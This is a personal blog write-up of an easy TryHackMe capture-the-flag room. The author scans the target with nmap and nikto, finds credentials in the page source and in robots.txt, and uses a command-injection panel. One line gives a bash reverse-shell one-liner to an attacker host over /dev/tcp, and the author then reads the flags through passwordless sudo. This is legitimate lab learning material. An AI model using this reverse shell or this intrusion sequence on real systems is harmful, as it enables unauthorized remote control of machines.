go back / p4p1

Created on Sat. 02 May 2020

Today I completed an other room on tryhackme with a Rick and Morty theme to it!

I am still a noob and I did do a few errors while trying to break into this machine.


As usual I scanned the IP provided by tryhackme to see what services are running on the machine.

            Starting Nmap 7.60 ( https://nmap.org ) at 2020-05-02 14:24 CEST
            Pre-scan script results:
            | broadcast-avahi-dos:
            |   Discovered hosts:
            |   After NULL UDP avahi packet DoS (CVE-2011-1002).
            |_  Hosts are all up (not vulnerable).
            Nmap scan report for
            Host is up (0.020s latency).
            Not shown: 998 closed ports
            22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
            80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
            | http-cookie-flags:
            |   /login.php:
            |     PHPSESSID:
            |_      httponly flag not set
            |_http-csrf: Couldn't find any CSRF vulnerabilities.
            |_http-dombased-xss: Couldn't find any DOM based XSS.
            | http-enum:
            |   /login.php: Possible admin folder
            |_  /robots.txt: Robots file
            | http-fileupload-exploiter:
            |     Couldn't find a file-type field.
            |_    Couldn't find a file-type field.
            |_http-server-header: Apache/2.4.18 (Ubuntu)
            | http-sql-injection:
            |   Possible sqli for queries:
            |_http-stored-xss: Couldnt find any stored XSS vulnerabilities.
            Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

            Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
            Nmap done: 1 IP address (1 host up) scanned in 359.68 seconds

            #[p4p1@computer thm/]$ nikto -host
            - Nikto v2.1.5
            + Target IP:
            + Target Hostname:
            + Target Port:        80
            + Start Time:         2020-05-02 18:33:22 (GMT2)
            + Server: Apache/2.4.18 (Ubuntu)
            + Server leaks inodes via ETags, header found with file /, fields: 0x426 0x5818ccf125686
            + The anti-clickjacking X-Frame-Options header is not present.
            + No CGI Directories found (use '-C all' to force check all possible dirs)
            + "robots.txt" retrieved but it does not contain any 'disallow' entries (which is odd).
            + Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
            + Cookie PHPSESSID created without the httponly flag
            + OSVDB-3233: /icons/README: Apache default file found.
            + /login.php: Admin login page/section found.
            + 6544 items checked: 0 error(s) and 7 item(s) reported on remote host
            + End Time:           2020-05-02 18:44:53 (GMT2) (376 seconds)

While the nikto and nmap scans where running I also decided to run a few scans with OWASP zap proxy just in case.

With all of the scans finished and all of this information I went on the main page to explore a little. I then opened the source code and found a username.

With that out of my way their is obviously a login page somewhere. Looking back at the scans it was pretty obvious the login page was in /login.php. But the scans also returned some information about robots.txt so I decided I should visit that too. Opening the robots.txt file I see a string that resembles a password so I decided to go on the login page and try it.

Command Injection

From here after logging in with ricks account there was a command panel. Seeing this I wanted to inject some kind of reverse shell so that I could mess around a lot more! So I began by seeing who I was and what was inside of the directory.

I was in /var/www/html and my user was: www-data. With sudo -l I saw that I had basically root access from the get go, so no need for any Privilege Escalation today. In the current working directory of the user www-data the first flag is located in a .txt file. With also a clue.txt I opened the file in my browser and it gave me the position of the second flag is in the /home/ folder. When running the cat command inside of the shell there was an error and I could not run the cat command. So I figured I needed a proper shell either a reverse one or with a phpbash script. So I uploaded php bash but the script wasn't working for some reason.

After a lot of trial and error with python reverse shells not understanding why that didn't work I looked up at an other write up and found that you could do a bash reverse shell and after running it encapsulated in a bash -c ''. I had a reverse shell:

            bash -c 'bash -i >& /dev/tcp/x.x.x.x/8080 0>&1'

With the reverse shell working I then displayed the flag in the home folder and with the prior knowledge that the user could run sudo commands without password I displayed the flag located in the root directory

In conclusion this room was easy but I felt very rusty I took a 3 day break and it really didn't help I need to get back in the flow of solving those rooms.

Thank you for reading please check out my other write ups and share this page.

My tryhackme account
tryhackme github badge

A github workflow to add your tryhackme stats to your github profile.

store | How it was build | repo
Questions / Feedback
For any questions or feedback you can contact me on LinkedIn or twitter / X. I also use twitter as a platform to update on new posts!
sponsor me image

If you like the content of my website you can help me out by donating through my github sponsors page.